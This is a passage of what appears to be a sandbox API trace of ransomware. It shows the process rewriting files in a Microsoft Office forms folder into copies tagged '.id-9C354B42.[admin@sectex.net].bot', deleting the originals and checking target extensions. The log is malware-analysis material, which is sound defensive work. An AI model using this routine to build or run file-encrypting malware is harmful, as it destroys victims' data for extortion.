	[0163.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdcncl.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0163.946] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=821) returned 1
	[0163.946] CloseHandle (hObject=0x25c) returned 1
	[0163.946] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdcncl.cfg")) returned 0x20
	[0163.946] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdcncl.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdcncl.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0163.946] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.947] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdcncl.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0163.947] GetLastError () returned 0x0
	[0163.947] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x335, lpOverlapped=0x0) returned 1
	[0163.949] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x340, lpOverlapped=0x0) returned 1
	[0163.950] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.950] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.950] SetEndOfFile (hFile=0x3f0) returned 1
	[0163.950] CloseHandle (hObject=0x3f0) returned 1
	[0163.950] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.950] SetEndOfFile (hFile=0x25c) returned 1
	[0163.952] CloseHandle (hObject=0x25c) returned 1
	[0163.952] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.952] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdcncl.cfg")) returned 1
	[0163.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG") returned 66
	[0163.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG") returned 66
	[0163.953] lstrlenW (lpString=".doc") returned 4
	[0163.953] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0163.953] lstrlenW (lpString=".docx") returned 5
	[0163.953] lstrcmpiW (lpString1=".docx", lpString2="L.CFG") returned -1
	[0163.953] lstrlenW (lpString=".pdf") returned 4
	[0163.953] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0163.953] lstrlenW (lpString=".xls") returned 4
	[0163.953] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0163.953] lstrlenW (lpString=".xlsx") returned 5
	[0163.953] lstrcmpiW (lpString1=".xlsx", lpString2="L.CFG") returned -1
	[0163.953] lstrlenW (lpString=".ppt") returned 4
	[0163.953] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0163.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG") returned 66
	[0163.953] lstrlenW (lpString=".zip") returned 4
	[0163.953] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0163.954] lstrlenW (lpString=".rar") returned 4
	[0163.954] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0163.954] lstrlenW (lpString=".bz2") returned 4
	[0163.954] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0163.954] lstrlenW (lpString=".7z") returned 3
	[0163.954] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0163.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG") returned 66
	[0163.954] lstrlenW (lpString=".dbf") returned 4
	[0163.954] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0163.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG") returned 66
	[0163.954] lstrlenW (lpString=".1cd") returned 4
	[0163.954] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0163.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG") returned 66
	[0163.954] lstrlenW (lpString=".jpg") returned 4
	[0163.954] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0163.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG") returned 66
	[0163.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG") returned 66
	[0163.954] lstrlenW (lpString=".doc") returned 4
	[0163.954] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0163.954] lstrlenW (lpString=".docx") returned 5
	[0163.954] lstrcmpiW (lpString1=".docx", lpString2="L.CFG") returned -1
	[0163.954] lstrlenW (lpString=".pdf") returned 4
	[0163.954] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0163.954] lstrlenW (lpString=".xls") returned 4
	[0163.954] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0163.954] lstrlenW (lpString=".xlsx") returned 5
	[0163.954] lstrcmpiW (lpString1=".xlsx", lpString2="L.CFG") returned -1
	[0163.954] lstrlenW (lpString=".ppt") returned 4
	[0163.954] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0163.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG") returned 66
	[0163.954] lstrlenW (lpString=".zip") returned 4
	[0163.954] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0163.954] lstrlenW (lpString=".rar") returned 4
	[0163.954] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0163.955] lstrlenW (lpString=".bz2") returned 4
	[0163.955] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0163.955] lstrlenW (lpString=".7z") returned 3
	[0163.955] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0163.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG") returned 66
	[0163.955] lstrlenW (lpString=".dbf") returned 4
	[0163.955] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0163.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG") returned 66
	[0163.955] lstrlenW (lpString=".1cd") returned 4
	[0163.955] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0163.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG") returned 66
	[0163.955] lstrlenW (lpString=".jpg") returned 4
	[0163.955] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0163.955] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0163.955] lstrlenW (lpString="SCHDREQ.CFG") returned 11
	[0163.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdreq.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0163.956] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1199) returned 1
	[0163.956] CloseHandle (hObject=0x25c) returned 1
	[0163.956] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdreq.cfg")) returned 0x20
	[0163.956] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdreq.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdreq.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0163.956] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.956] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdreq.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0163.957] GetLastError () returned 0x0
	[0163.957] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x4af, lpOverlapped=0x0) returned 1
	[0164.104] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x4b0, lpOverlapped=0x0) returned 1
	[0164.398] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.399] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0164.399] SetEndOfFile (hFile=0x3f0) returned 1
	[0164.399] CloseHandle (hObject=0x3f0) returned 1
	[0164.399] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.399] SetEndOfFile (hFile=0x25c) returned 1
	[0164.401] CloseHandle (hObject=0x25c) returned 1
	[0164.401] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.542] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdreq.cfg")) returned 1
	[0164.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG") returned 65
	[0164.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG") returned 65
	[0164.546] lstrlenW (lpString=".doc") returned 4
	[0164.546] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0164.546] lstrlenW (lpString=".docx") returned 5
	[0164.546] lstrcmpiW (lpString1=".docx", lpString2="Q.CFG") returned -1
	[0164.546] lstrlenW (lpString=".pdf") returned 4
	[0164.546] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0164.546] lstrlenW (lpString=".xls") returned 4
	[0164.546] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0164.546] lstrlenW (lpString=".xlsx") returned 5
	[0164.546] lstrcmpiW (lpString1=".xlsx", lpString2="Q.CFG") returned -1
	[0164.546] lstrlenW (lpString=".ppt") returned 4
	[0164.546] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0164.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG") returned 65
	[0164.546] lstrlenW (lpString=".zip") returned 4
	[0164.546] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0164.546] lstrlenW (lpString=".rar") returned 4
	[0164.546] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0164.546] lstrlenW (lpString=".bz2") returned 4
	[0164.546] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0164.546] lstrlenW (lpString=".7z") returned 3
	[0164.546] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0164.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG") returned 65
	[0164.546] lstrlenW (lpString=".dbf") returned 4
	[0164.546] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0164.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG") returned 65
	[0164.546] lstrlenW (lpString=".1cd") returned 4
	[0164.547] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0164.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG") returned 65
	[0164.547] lstrlenW (lpString=".jpg") returned 4
	[0164.547] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0164.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG") returned 65
	[0164.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG") returned 65
	[0164.547] lstrlenW (lpString=".doc") returned 4
	[0164.547] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0164.547] lstrlenW (lpString=".docx") returned 5
	[0164.547] lstrcmpiW (lpString1=".docx", lpString2="Q.CFG") returned -1
	[0164.547] lstrlenW (lpString=".pdf") returned 4
	[0164.547] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0164.547] lstrlenW (lpString=".xls") returned 4
	[0164.547] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0164.547] lstrlenW (lpString=".xlsx") returned 5
	[0164.547] lstrcmpiW (lpString1=".xlsx", lpString2="Q.CFG") returned -1
	[0164.547] lstrlenW (lpString=".ppt") returned 4
	[0164.547] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0164.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG") returned 65
	[0164.547] lstrlenW (lpString=".zip") returned 4
	[0164.547] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0164.547] lstrlenW (lpString=".rar") returned 4
	[0164.547] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0164.547] lstrlenW (lpString=".bz2") returned 4
	[0164.547] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0164.547] lstrlenW (lpString=".7z") returned 3
	[0164.547] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0164.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG") returned 65
	[0164.547] lstrlenW (lpString=".dbf") returned 4
	[0164.547] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0164.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG") returned 65
	[0164.547] lstrlenW (lpString=".1cd") returned 4
	[0164.547] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0164.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG") returned 65
	[0164.548] lstrlenW (lpString=".jpg") returned 4
	[0164.548] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0164.548] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0164.548] lstrlenW (lpString="SIGNS.ICO") returned 9
	[0164.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signs.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0164.548] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2998) returned 1
	[0164.548] CloseHandle (hObject=0x3f0) returned 1
	[0164.548] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signs.ico")) returned 0x20
	[0164.549] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signs.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0164.549] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.549] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signs.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0164.550] GetLastError () returned 0x0
	[0164.550] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0164.587] WriteFile (in: hFile=0x3e8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0164.588] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.588] WriteFile (in: hFile=0x3e8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0164.588] SetEndOfFile (hFile=0x3e8) returned 1
	[0164.590] CloseHandle (hObject=0x3e8) returned 1
	[0164.590] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.590] SetEndOfFile (hFile=0x3f0) returned 1
	[0165.786] CloseHandle (hObject=0x3f0) returned 1
	[0165.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0165.898] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signs.ico")) returned 1
	[0165.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO") returned 63
	[0165.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO") returned 63
	[0165.899] lstrlenW (lpString=".doc") returned 4
	[0165.899] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0165.899] lstrlenW (lpString=".docx") returned 5
	[0165.899] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0165.899] lstrlenW (lpString=".pdf") returned 4
	[0165.899] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0165.899] lstrlenW (lpString=".xls") returned 4
	[0165.899] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0165.899] lstrlenW (lpString=".xlsx") returned 5
	[0165.899] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0165.899] lstrlenW (lpString=".ppt") returned 4
	[0165.899] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0165.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO") returned 63
	[0165.899] lstrlenW (lpString=".zip") returned 4
	[0165.899] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0165.899] lstrlenW (lpString=".rar") returned 4
	[0165.899] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0165.899] lstrlenW (lpString=".bz2") returned 4
	[0165.899] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0165.899] lstrlenW (lpString=".7z") returned 3
	[0165.899] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0165.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO") returned 63
	[0165.899] lstrlenW (lpString=".dbf") returned 4
	[0165.899] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0165.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO") returned 63
	[0165.899] lstrlenW (lpString=".1cd") returned 4
	[0165.899] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0165.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO") returned 63
	[0165.900] lstrlenW (lpString=".jpg") returned 4
	[0165.900] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0165.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO") returned 63
	[0165.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO") returned 63
	[0165.900] lstrlenW (lpString=".doc") returned 4
	[0165.900] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0165.900] lstrlenW (lpString=".docx") returned 5
	[0165.900] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0165.900] lstrlenW (lpString=".pdf") returned 4
	[0165.900] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0165.900] lstrlenW (lpString=".xls") returned 4
	[0165.900] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0165.900] lstrlenW (lpString=".xlsx") returned 5
	[0165.900] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0165.900] lstrlenW (lpString=".ppt") returned 4
	[0165.900] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0165.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO") returned 63
	[0165.900] lstrlenW (lpString=".zip") returned 4
	[0165.900] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0165.900] lstrlenW (lpString=".rar") returned 4
	[0165.900] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0165.900] lstrlenW (lpString=".bz2") returned 4
	[0165.900] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0165.900] lstrlenW (lpString=".7z") returned 3
	[0165.900] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0165.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO") returned 63
	[0165.900] lstrlenW (lpString=".dbf") returned 4
	[0165.900] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0165.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO") returned 63
	[0165.900] lstrlenW (lpString=".1cd") returned 4
	[0165.900] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0165.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO") returned 63
	[0165.901] lstrlenW (lpString=".jpg") returned 4
	[0165.901] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0165.901] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0165.901] lstrlenW (lpString="TASK.CFG") returned 8
